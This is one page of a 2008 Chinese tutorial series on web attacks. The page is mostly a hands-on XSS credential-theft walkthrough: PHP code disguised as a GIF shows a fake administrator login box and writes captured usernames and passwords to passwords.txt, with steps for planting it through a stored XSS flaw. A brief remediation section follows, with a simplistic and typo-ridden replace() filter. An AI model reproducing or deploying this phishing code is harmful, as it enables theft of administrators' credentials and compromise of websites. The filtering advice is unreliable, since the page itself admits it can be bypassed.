从黑客角度来阐述如何防御应用层攻击(5)

作者: 伤心的鱼 出处:IT168　2008-04-15 16:01　   砖    好    评论  条 　进入论坛

阅读提示：随着网络与信息技术的飞速发展，尤其是在互连网飞速发展的今天，网络已经逐渐改变了人们的生活方式 ，成了生活中不可缺少的一部分。

为了不让管理员发现，我们用图片来伪装了。好了，那我们就来看看利用程序吧！代码如下：
★
header("Content-type: image/gif");
$image = imagecreatefromgif('mellow.gif');
if(!$_COOKIE['LOGON'])
{
$login = $_SERVER['PHP_AUTH_USER'];
$pass = $_SERVER['PHP_AUTH_PW'];
if(strlen($pass) <= 4 || !$login)
{
Header('HTTP/1.1 401 Unauthorized');
Header('WWW-Authenticate: Basic realm="管理员验证 - login"');
}
elseif($login)
{
setcookie('LOGON',md5($pass));
$f = fopen('passwords.txt', 'ab');
fwrite($f, $login." ||| ".$pass."\r\n");
fclose($f);
}
}
imagegif($image);
imagedestroy($image);
?>
★

新建个文档，把代码保存在文件内，后缀名改成图片格式。然后去网上找个小型的图片文件。将这两个图片放在同一个目录下就OK了。★$image = imagecreatefromgif('mellow.gif');★这里就是调用的正常图片文件！然后我们在跨站那里输入，如果成功的话，就会生成个passwords.txt文件，文件内记录着管理员输入的帐号和密码！废话不少说了，现在我们来演示下吧，可能有的人说？管理一般都在后台进行留言管理的。很少跑到前台的，其实后台也要调用那文件。只要管理员进了后台，进行留言管理就能利用的。另外不要搞错哦，那代码是PHP的，要在PHP环境下才能正常解析！如果大家没有PHP的空间，去找个支持PHP的Webshell也行。大家看到没，出现了登陆框，不精明的网管会以为是程序的验证。那么，他就会输入帐号和密码再次进行验证。刷新下，密码框就不会出现。除非你删除你机子上的cookie才行。这样迷域性更大了，如图9

看到了吧 我们成功的偷到管理员的密码了。怎么样？你会利用了么？？

现在大家都知道怎样去利用XSS漏洞，那也应该要学习学习怎样去修补漏洞！有攻就有防嘛，呵呵！这里我简单说一下修补漏洞利用replace()函数就可以了。可能有些初学者不太了解replace()函数怎样去利用。例如这段程序，未修补的代码：
★rs("title")=trim(request.form("title"))★
修补后的代码：
★Rs("title")=replace(trim(request.from("title")"<","//"))★

如果从客户端获取的title变量出现<就自动替换为//。那么测试语句就无法闭合了！当然还是可以转换为其它语句进行突破的，这只是演示怎样用replace函数简单的去过滤一些语句！我想，到这里大家也应该怎样去修补漏洞了吧！

笔者再说一下关于XSS的一点东西，可能有些朋友看完这篇文章以后会认为所有的跨站都是可以这么利用的。其实不然，有些跨站就真的只是能弹个窗口，但是他并不写入数据库。这样是没有任何意义的，我们来拿百度做实验，打开百度以后选择MP3然后点击音乐掌门人在搜索框内输入★★，成功弹出fish的框框，如图11

虽然成功的弹出了对话框，但是这个并不能算是真正意义上的跨站，因为他并没有写入数据库，除了能糊弄一些不懂的人之外，并没有任何的利用价值的。 所以在寻找跨站漏洞以及利用的过程中更多的是需要认真观察。寻找任何可利用的蛛丝马迹。

有关XSS漏洞攻击和防御，读者也可以看IT168安全频道做的XSS攻防专题：

http://www4.it168.com/jtzt/shenlan/safe/xss/index.html

共7页: 上一页 [1] [2] [3] [4] 5 [6] [7] 下一页

【内容导航】  第 1 页：黑客组织越来越正规化  第 2 页：SQL注入攻击  第 3 页：注入漏洞之旁注攻击  第 4 页：跨站攻击  第 5 页：XSS跨站攻击盗取密码  第 6 页：分布式拒绝服务攻击  第 7 页：社会工程学